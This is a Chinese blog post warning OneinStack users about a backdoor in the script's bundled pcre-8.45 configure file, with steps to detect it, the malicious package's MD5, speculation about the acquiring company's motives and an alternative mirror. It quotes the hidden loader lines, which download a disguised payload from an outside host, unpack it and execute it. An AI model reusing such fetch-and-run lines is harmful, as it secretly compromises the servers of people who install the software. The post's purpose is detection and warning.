我用oneinstack很多年了,之前就被爆出来一次被植入后门的事件,今年又出现一次,刚爆出来的时候我就关注去检查了一遍,今天又看见有人提起了oneinstack,所以就自己记录下,虽然2次我都避开了。但这一次经历过后,对oneinstack就有点…但是吧,我又已经习惯用这个了,所以短时间内,如果我有安装需求,还是会用oneinstack,只是会先自己检查一遍以及替换官方源了。

首先在脚本植入后门程序,不管是在什么地方都是违法的,在国内:

对计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。

1、检查oneinstack后门版本

在文件夹:oneinstack/src/pcre-8.45

打开:configure文件,在里面搜索:download.oneinstack.club

看看有没有这句:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg

如果有这句,代表就是有被植入后门的版本,因为我没有这个恶意版本,所以下面用下别人的截图。

恶意包MD5:

md5sum oneinstack-full.tar.gz
3dc788dd9fe0c13e3db1411e53932331  oneinstack-full.tar.gz

恶意执行代码:

root@Huangxins-PC:~/oneinstack/src# grep -r '/var/local/' ~/oneinstack/
/root/oneinstack/src/pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg
/root/oneinstack/src/pcre-8.45/configure:tar zxf /var/local/osk.jpg -C /var/local/ > /dev/null
/root/oneinstack/src/pcre-8.45/configure:rm -f /var/local/osk.jpg
/root/oneinstack/src/pcre-8.45/configure:/var/local/cron/load linhkkngf@QWE

这次Oneinstack、lnmp、wdcp被一家新公司同时收购,先后被爆出后门(除了wdcp,因为没人关注它),这家公司还去把别人的软件Termius、navicat、BetterTouchTool注册了软件著作权,以及根据Oneinstack作者(是不是真的原作者都存疑)的回复来看,这一系列操作非常耐人寻味。Termius是远程管理,navicat是数据库管理。

你自己代入一下,假如你想开一家饮料品牌公司,你去收购了几家现有市场占有率4 5名的饮料品牌,然后第一时间就给原来的饮料里面加点马尿,这特么是想打开知名度吗???这叫自毁,并且还是负面的,这明显就是特意为了搞臭这几个老品牌,这也是搞掉竞争对手的一种方式。在这种软件行业里面,这是成本极低的一种方式。

如果Oneinstack作者回复没有提到下面这些,我觉得可能真的就是某个黑产大佬,想利用服务器搞黑产,但是想想现在这类黑产并没有什么搞头,挖矿吗?这个太容易被服务器拥有者发现了,拿来当肉鸡搞攻击吗?这个市场现在不多了,并且国内现在严查这块非法攻击入侵,还有可能是通过服务器获取里面的网站数据,但是用这些脚本的大部分都是中小网站,特别更多的是个人网站,又能拿到什么数据呢….

结果他的回复,反而让我想到了另一种情况,如果是同行恶意毁就不一样了,毁掉其他对手,让自己的用户多起来搞垄断,现在互联网行业有用户就是钱,用户多了,就算前期不赚钱,但是可以靠这个用户量去走一波上市,到时候就赚大了。

由于这家公司本身还在搞破解版软件,这玩意背后大部分都是植入病毒搞黑产的,所以他们说背后是黑产大佬的布局,从这点上也站得住脚,我一开始也是支持这种看法,当我看了Oneinstack作者回复,以及他们这一系列操作,就站在商业角度位置想到了另外一种可能性,就是同行恶意搞坏。当然了具体怎么样,只有他们自己知道了。

不管是想做同类产品还是搞黑产,反正这种搞后门的做法都是违法的!!!

如果真的是正常的商业收购,不可能在背后悄悄搞这种犯法植入后门的事情,正常的商业品牌收购,是买过来之后,正大光明的发布公告,引流到他想运营的面板或脚本的品牌官网上,然后一步步淡化原品牌的功能或者减少更新,只把原品牌当个引流渠道就行,按照Oneinstack作者的回复,做面板布局,那这才是后背公司应该正常做的事情。

当然了这件事为什么有人会骂Oneinstack作者,这本来可以和他无关的,可能是他自己也没想到被人拿去搞事情了,然后就是他没有提前告知他的用户,因为这些用户信任的是他原作者,那他就得背上同流合污的锅,如果他要是知道…那就。。。希望他是不知道吧,其实卖之后就发个公告就完事了,之后发生什么就和他完全无关了。结果这几家都是静悄悄的,这可不像一家要布局产品的正常行为,你换个自己要做品牌的角度想下就明白了。

2、替换软件源

github上一个人整理的:https://oneinstack-redirect-mirror.pages.dev/

不过在使用的时候还是也看下